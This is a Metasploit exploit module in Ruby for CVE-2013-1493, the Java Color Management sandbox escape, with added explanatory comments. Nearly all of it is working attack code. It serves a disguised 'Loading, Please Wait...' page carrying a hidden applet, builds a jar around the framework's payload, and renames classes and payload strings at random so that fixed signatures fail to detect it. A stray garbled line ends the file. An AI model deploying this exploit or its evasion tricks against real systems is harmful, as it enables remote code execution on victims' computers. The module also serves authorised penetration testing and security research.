##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
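# Framework core and the Rex support library (typographic quotes in the
# pasted copy made these lines unparsable; plain ASCII quotes restored).
require 'msf/core'
require 'rex'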
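# Browser-exploit module for CVE-2013-1493 (Java CMM / Color Management).
#
# The module only acts as glue: it serves a small HTML page that embeds an
# applet, and on request builds a jar from the framework's payload jar plus
# four precompiled class files shipped under data/exploits/cve-2013-1493.
# The exploit logic itself lives in those class files, not in this file.
#
# Note for reviewers: the pasted original had `'DefaultTarget' => 1,` stranded
# inside on_request_uri (a syntax error that also dropped the default target);
# it belongs in the update_info hash and is restored there.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  # Module metadata: name, description, references, payload constraints and
  # the two supported targets (Java payload, Windows x86 native payload).
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled class files from the framework data directory
  # and picks a per-run name for the applet entry-point class.
  #
  # The replacement name has the same length as "Init"; presumably this keeps
  # the length-prefixed strings inside the compiled class consistent, since the
  # rename is done by byte substitution rather than by recompiling.
  # Defensive note: because the entry-point class name changes on every run,
  # detection keyed on a fixed class name in the served jar is unreliable; the
  # remaining entries (Leak.class, MyBufferedImage.class, MyColorSpace.class)
  # keep their static names.
  #
  # @raise [Errno::ENOENT] if a class file is missing from the data directory
  def setup
    @init_class           = read_class_file('Init.class')
    @leak_class           = read_class_file('Leak.class')
    @buffered_image_class = read_class_file('MyBufferedImage.class')
    @color_space_class    = read_class_file('MyColorSpace.class')

    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)
    super
  end

  # HTTP request dispatcher.
  #
  # * a URI ending in ".jar" is answered with the applet jar;
  # * a URI ending in "/" is answered with the HTML wrapper (after the payload
  #   for this client could be regenerated);
  # * anything else is redirected to the resource root.
  #
  # request.uri is untrusted client input; it is only matched against the
  # anchored patterns below and echoed into the console status line.
  #
  # @param cli [Object] client connection handed in by the HTTP server mixin
  # @param request [Object] parsed request; only #uri is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar\z/i
      # \z instead of $ so the match is against the end of the whole string.
      send_response(cli, build_applet_jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/\z}
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the minimal page that embeds the applet. The archive name is random
  # per request, the code attribute is the per-run entry-point class chosen in
  # #setup, and the applet is sized 1x1.
  #
  # @return [String] HTML document
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    html
  end

  private

  # Reads one class file from data/exploits/cve-2013-1493 as binary.
  #
  # @param name [String] file name inside the data directory
  # @return [String] raw file contents (binary encoding)
  def read_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Assembles the applet jar: the framework's encoded payload jar plus the four
  # class files loaded in #setup. The framework names its payload classes with
  # "metasploit"/"Payload"; those substrings are replaced, in entry names and
  # entry bytes alike, with random strings of equal length before the manifest
  # is built.
  #
  # @return [Object] jar object ready to be sent with send_response
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end
    jar.build_manifest
    jar
  end
end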
* Z! J) U1 }7 D- `2 U |